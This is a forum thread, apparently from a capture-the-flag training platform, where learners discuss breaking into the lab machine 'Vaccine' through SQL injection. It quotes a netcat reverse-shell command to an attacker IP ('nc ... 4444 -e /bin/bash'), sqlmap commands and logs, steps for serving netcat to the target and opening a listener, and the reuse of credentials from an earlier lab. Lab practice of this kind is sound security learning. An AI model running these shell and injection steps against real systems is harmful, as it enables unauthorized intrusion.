I’ve been stuck on this box for over a week. Im double frustrated as I bought VIP access when I first started but can’t use it as this box is in my way.
I was able to get the --os-shell to work earlier but then it timed out when I attempted to execute the reverse bash shell.
Getting through this box is going to need some stubborn determination I think. If anything its a good thing that its not working becuase its going to force us to think for ourselves and self learn what we don’t know. There will be another way in I am sure.
I’m not using MSF, I’m trying to use it sparingly as I don’t believe MSF is a very good tool for learning. I’m trying a manual exploit but I keep getting timeouts on port 80 which makes that kind of hard.
Hello,
I have the same issue: time out when using the --os-shell option with sqlmap.
Doing it manually (with florianges’s python script) does not seem to solve the issue.
Same here with sqlmap and manually or with @florianges script, which is also not working and seems to fail after the last command: “ERROR: program “/tmp/XXXXX/nc 10.10.14.XX 4444 -e /bin/bash” failed DETAIL: command not found”
For those experiencing issues with port 80 interaction on Vaccine, please take note that as @drugantibus reported, this is due to users exiting their os-shell improperly. You will have to issue a reset vote every time Vaccine is unresponsive on port 80 or switch servers to find a working Vaccine SQL service.
Thank you.
I’ve been stuck on this for days now because people keep on crashing the server. Literally as soon is a reset vote is done someone almost IMMEDIATELY screws it up again… Very frustrating, especially as this is supposed to be a beginner box.
Does VIP access include VIP access to the starting servers or only the servers past this point? At this stage I’m willing to just throw money at the issue so I can move on.
Hiya,
Yes VIP includes a separate server for starting-point VIP. However, there’s no assurance that VIP members will not create instability on the box, as the number of VIP servers for starting-point is smaller than that of main machines.
Maybe try tackling the machine at a different time of day.
I really struggled on this one with the same issues, gave up on sqlmap and used @florianges ’ Python script. Struggled to understand the nc parameter I was meant to set. Couldn’t get it working at first but in the end I literally followed his video step by step, copied the bin file (cp /bin/nc .) into the same location as the web server and then it worked. I was just taking an nc.exe file and copying it into the location and then setting the parameter to nc.exe but that was wrong.
hi guys need help with this machine… when i run the sqlmap with the right cookie it is giving me a 302 redirect to index.php
anyone know how to get pass this?
sqlmap -u ‘http://10.10.10.46/dashboard.php?search=a’ --cookie=“PHPSESSID:3dr3h62vjq0tn58mu5o1oep0e8”
[21:43:28] [INFO] testing connection to the target URL
got a 302 redirect to ‘http://10.10.10.46:80/index.php’. Do you want to follow? [Y/n] n
[21:43:29] [INFO] testing if the target URL content is stable
[21:43:29] [WARNING] GET parameter ‘search’ does not appear to be dynamic
[21:43:30] [WARNING] heuristic (basic) test shows that GET parameter ‘search’ might not be injectable
[21:43:30] [INFO] testing for SQL injection on GET parameter ‘search’
[21:43:30] [INFO] testing ‘AND boolean-based blind - WHERE or HAVING clause’
[21:43:30] [INFO] testing ‘Boolean-based blind - Parameter replace (original value)’
[21:43:30] [INFO] testing ‘MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)’
[21:43:31] [INFO] testing ‘PostgreSQL AND error-based - WHERE or HAVING clause’
[21:43:31] [INFO] testing ‘Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)’
[21:43:32] [INFO] testing ‘Oracle AND error-based - WHERE or HAVING clause (XMLType)’
[21:43:32] [INFO] testing ‘MySQL >= 5.0 error-based - Parameter replace (FLOOR)’
[21:43:32] [INFO] testing ‘Generic inline queries’
[21:43:32] [INFO] testing ‘PostgreSQL > 8.1 stacked queries (comment)’
[21:43:32] [INFO] testing ‘Microsoft SQL Server/Sybase stacked queries (comment)’
[21:43:33] [INFO] testing ‘Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)’
[21:43:33] [INFO] testing ‘MySQL >= 5.0.12 AND time-based blind (query SLEEP)’
[21:43:34] [INFO] testing ‘PostgreSQL > 8.1 AND time-based blind’
[21:43:34] [INFO] testing ‘Microsoft SQL Server/Sybase time-based blind (IF)’
[21:43:34] [INFO] testing ‘Oracle AND time-based blind’
It looks like a few people had questions about how to manually perform the sql injection. Using Florianges methodology, I was able to get it working manually. Here is what i did:
Assumptions: you are logged into the website using admin creds.
Stand up a simple websever on port 80
[sudo python3 -m http.server 80]
In the case of the server above, my server makes my desktop the root directory. So i made sure i had a copy of netcat on my desktop (i put it in a folder called bin for funsies)
open up netcat on port 4444 (or whatever port)
[nc -lvnp 4444]
Check netcat - you should have a terminal. Do a test command like whoami if you’d like.
— fin —
note2: the number 27440 is a random number. i’d recommend changing it when you execute.
This challenge was a little trickier due to sqlmap not working but i enjoyed learning how to do a manual sql injection. If anyone is able to help me understand why sqlmap isnt working, i’d be interested to know.
hi guys need help with this machine… when i run the sqlmap with the right cookie it is giving me a 302 redirect to index.php
anyone know how to get pass this?
sqlmap -u ‘http://10.10.10.46/dashboard.php?search=a’ --cookie=“PHPSESSID:3dr3h62vjq0tn58mu5o1oep0e8”
[21:43:28] [INFO] testing connection to the target URL
got a 302 redirect to ‘http://10.10.10.46:80/index.php’. Do you want to follow? [Y/n] n
[21:43:29] [INFO] testing if the target URL content is stable
You have error in command. It is PHPSESSID=3dr3h62vjq0tn58mu5o1oep0e8. You copied from web browser with “:” and used PHPSESSID:3dr3h62vjq0tn58mu5o1oep0e8
I understand the vulnerability, thanks to the link posted by @florianges. I can also read and understand the python script. How did you learn about dashboard.php?
Hi! i guess, accessing the server was not an issue and sql injection was not mandatory to gain OS access, I simply used the ftpuser password from last lab filezilla config and it to login to the server and gain access to postgresql user. But now i’m stuck with the privilege escalation…!